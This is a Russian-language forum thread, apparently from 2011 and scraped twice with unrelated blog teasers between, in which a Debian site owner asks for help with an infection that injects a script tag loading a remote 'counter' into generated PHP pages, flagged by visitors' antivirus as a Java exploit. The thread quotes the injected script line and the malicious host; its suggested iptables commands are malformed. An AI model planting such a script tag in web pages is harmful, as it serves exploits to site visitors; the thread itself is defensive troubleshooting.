Может какая-то дыра в безопасности?

@ANJUVI · Регистрация: 04.09.2011

Студворк — интернет-сервис помощи студентам

Сервер на Debian, похоже, подцепил какую-то бяку, она заразила сайт на этом сервере.

Подписывает в php файлы, сгенерированные шаблонизатором, строку
<script type="text/javascript" src="http://statun.cu.cc/counter.php"></script>
В самих шаблонах ее нет, в файлах шаблонизатора тоже.

В результате у пользователей, которые заходят на сайт, если антивирус Authentium,
Eset, F-Prot, Kaspersky или McAfee, находится

Вирус HEUR:Exploit.Script.Generic в объекте http://statscounter.cu.cc/content/pch.php?f=16
(Exploit.Java.CVE-2010-0840.ch)

Поиск в файлах сайта строки statun.cu.cc результата не дал. В папке с сайтом ничего подозрительного не нашлось. Clamav на сервере ничего не находит.
Где эта гадость может сидеть и что это вообще может быть? Может какая-то дыра в безопасности?

@seo8 · 04.09.2011, 19:43

через iptables заблокирую этот сайт.
iptables -A INPUT url -j REJECT
iptables -A OUTPUT ir; -j REJECT

потом уже разбирайся что да как.

12.09.2011, 14:45

Прошу прощения, вы победили этот вирус? У нас та же проблема 1в1.. Хотелось бы узнать метод избавления от него.

Vourhey · 12.09.2011, 17:25

А если проверить не на живом сайте, а просто натравить шаблонизатор на шаблон, строка появится в итоговом файле? Может быть заражена и библиотека и исполняемый файл. Чексуммы бы проверить, да с оригиналами сравнить, переустановить пакеты можно.

15.09.2011, 15:45

Буквально на днях поборол такую бяку.
Если поможет, вот ссылка на "отчёт": http://creovoid.blogspot.com/2... -post.html
Если будут вопросы - стучитесь, попробуем решить.

Новые блоги и статьи Все статьи Все блоги /
Конвертировать закладки radiotray-ng в m3u-плейлист damix 19.02.2026 Это можно сделать скриптом для PowerShell. Использование . \СonvertRadiotrayToM3U. ps1 <path_to_bookmarks. json> Рядом с файлом bookmarks. json появится файл bookmarks. m3u с результатом. # Check if. . .	Семь CDC на одном интерфейсе: 5 U[S]ARTов, 1 CAN и 1 SSI Eddy_Em 18.02.2026 Постепенно допиливаю свою "многоинтерфейсную плату". Выглядит вот так: https:/ / www. cyberforum. ru/ blog_attachment. php?attachmentid=11617&stc=1&d=1771445347 Основана на STM32F303RBT6. На борту пять. . .	Символьное дифференцирование igorrr37 13.02.2026 / * Программа принимает математическое выражение в виде строки и выдаёт его производную в виде строки и вычисляет значение производной при заданном х Логарифм записывается как: (x-2)log(x^2+2) -. . .	Камера Toupcam IUA500KMA Eddy_Em 12.02.2026 Т. к. у всяких "хикроботов" слишком уж мелкий пиксель, для подсмотра в ESPriF они вообще плохо годятся: уже 14 величину можно рассмотреть еле-еле лишь на экспозициях под 3 секунды (а то и больше),. . .
И ясному Солнцу zbw 12.02.2026 И ясному Солнцу, и светлой Луне. В мире покоя нет и люди не могут жить в тишине. А жить им немного лет.	«Знание-Сила» zbw 12.02.2026 «Знание-Сила» «Время-Деньги» «Деньги -Пуля»	SDL3 для Web (WebAssembly): Подключение Box2D v3, физика и отрисовка коллайдеров 8Observer8 12.02.2026 Содержание блога Box2D - это библиотека для 2D физики для анимаций и игр. С её помощью можно определять были ли коллизии между конкретными объектами и вызывать обработчики событий столкновения. . . .	SDL3 для Web (WebAssembly): Загрузка PNG с прозрачным фоном с помощью SDL_LoadPNG (без SDL3_image) 8Observer8 11.02.2026 Содержание блога Библиотека SDL3 содержит встроенные инструменты для базовой работы с изображениями - без использования библиотеки SDL3_image. Пошагово создадим проект для загрузки изображения. . .

@ANJUVI 0 / 0 / 0 Регистрация: 04.09.2011 Сообщений: 5

	Может какая-то дыра в безопасности? 04.09.2011, 18:56. Показов 1928. Ответов 4 Метки нет (Все метки) Сервер на Debian, похоже, подцепил какую-то бяку, она заразила сайт на этом сервере. Подписывает в php файлы, сгенерированные шаблонизатором, строку <script type="text/javascript" src="http://statun.cu.cc/counter.php"></script> В самих шаблонах ее нет, в файлах шаблонизатора тоже. В результате у пользователей, которые заходят на сайт, если антивирус Authentium, Eset, F-Prot, Kaspersky или McAfee, находится Вирус HEUR:Exploit.Script.Generic в объекте http://statscounter.cu.cc/content/pch.php?f=16 (Exploit.Java.CVE-2010-0840.ch) Поиск в файлах сайта строки statun.cu.cc результата не дал. В папке с сайтом ничего подозрительного не нашлось. Clamav на сервере ничего не находит. Где эта гадость может сидеть и что это вообще может быть? Может какая-то дыра в безопасности? 0

@seo8 1 / 1 / 0 Регистрация: 04.09.2011 Сообщений: 11
	04.09.2011, 19:43
	через iptables заблокирую этот сайт. iptables -A INPUT url -j REJECT iptables -A OUTPUT ir; -j REJECT потом уже разбирайся что да как. 0

ThomasV
	12.09.2011, 14:45
	Прошу прощения, вы победили этот вирус? У нас та же проблема 1в1.. Хотелось бы узнать метод избавления от него.

Vourhey Почетный модератор 7393 / 2639 / 281 Регистрация: 29.07.2006 Сообщений: 13,696
	12.09.2011, 17:25
	А если проверить не на живом сайте, а просто натравить шаблонизатор на шаблон, строка появится в итоговом файле? Может быть заражена и библиотека и исполняемый файл. Чексуммы бы проверить, да с оригиналами сравнить, переустановить пакеты можно. 0

d_jay
	15.09.2011, 15:45
	Буквально на днях поборол такую бяку. Если поможет, вот ссылка на "отчёт": http://creovoid.blogspot.com/2... -post.html Если будут вопросы - стучитесь, попробуем решить.